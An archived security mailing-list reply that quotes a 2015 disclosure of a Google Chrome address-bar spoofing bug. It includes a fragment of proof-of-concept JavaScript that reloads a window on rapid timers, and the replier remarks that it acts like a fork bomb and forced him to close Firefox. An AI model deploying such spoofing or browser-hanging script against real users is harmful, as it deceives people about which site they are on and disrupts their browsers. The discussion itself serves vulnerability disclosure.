Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Tue, 30 Jun 2015 11:46:13 +0500
From: "Alexander E. Patrakov" <>
Subject: Re: Google Chrome Address Spoofing (Request For

30.06.2015 11:08, David Leo wrote:
> Impact:
> The "click to verify" thing is completely broken...
> Anyone can be "BBB Accredited Business" etc.
> You can make display "We love Islamic State" :-)
> Note:
> No user interaction on the fake page.
> Code:
> ***** index.html
> <script>
> function next()
> {
>      w.location.replace(''+n);n++;
>      setTimeout("next();",15);
>      setTimeout("next();",25);
> }

Looks like a fork bomb to me. And I had to forcefully close Firefox 
after this.

Alexander E. Patrakov

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ